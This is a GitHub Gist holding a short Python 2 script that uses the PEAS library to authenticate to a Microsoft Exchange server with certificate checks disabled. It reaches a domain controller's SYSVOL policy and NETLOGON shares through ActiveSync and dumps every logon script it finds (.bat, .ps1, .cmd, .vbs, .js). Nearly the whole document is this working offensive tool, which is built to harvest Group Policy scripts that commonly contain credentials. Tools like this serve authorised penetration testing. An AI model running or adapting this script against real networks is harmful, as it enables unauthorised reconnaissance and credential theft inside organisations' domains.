Last active
January 11, 2023 23:58
-
-
Save zimnyaa/c4380b0c6a62f8b4946d114aa2e05a7f to your computer and use it in GitHub Desktop.
Enumerate GPO scripts from Exchange with F-Secure/PEAS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import peas | |
client = peas.Peas() | |
client.disable_certificate_verification() | |
#### V CONFIG SECTION V #### | |
client.set_creds({ | |
'server': 'exch.domain.com', | |
'user': 'user', | |
'password': 'pass', | |
}) | |
dc = "\\\\dc" | |
domain = "domain.local" | |
#### ^ CONFIG SECTION ^ #### | |
print "[peas-gpo] auth ", client.check_auth() | |
searchbase = dc + "\\sysvol\\" + domain + "\\policies\\" | |
print "[peas-gpo] listing ", searchbase | |
def recurse_download(path): | |
# print "[peas-gpo]: !recurse_listing listing:", path | |
recurse_listing = client.get_unc_listing(path) | |
for subitem in recurse_listing: | |
if subitem['IsFolder'] == '1' and subitem["LinkId"] != path: | |
# print "[peas-gpo] navigating subfolder", subitem["LinkId"] | |
recurse_download(subitem["LinkId"]) | |
elif any(ext in subitem["LinkId"] for ext in ('.bat', '.ps1', '.cmd', '.vbs', '.js')): | |
print "[peas-gpo] dumping script", subitem | |
print client.get_unc_file(subitem["LinkId"]) | |
recurse_download(dc + "\\netlogon\\") | |
listing = client.get_unc_listing(searchbase) | |
for item in listing: | |
if item["IsFolder"] == "1" and "{" in item["LinkId"]: | |
print "[peas-gpo] enumerating GPO ", item["LinkId"][len(searchbase):] | |
recurse_download(item["LinkId"]) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment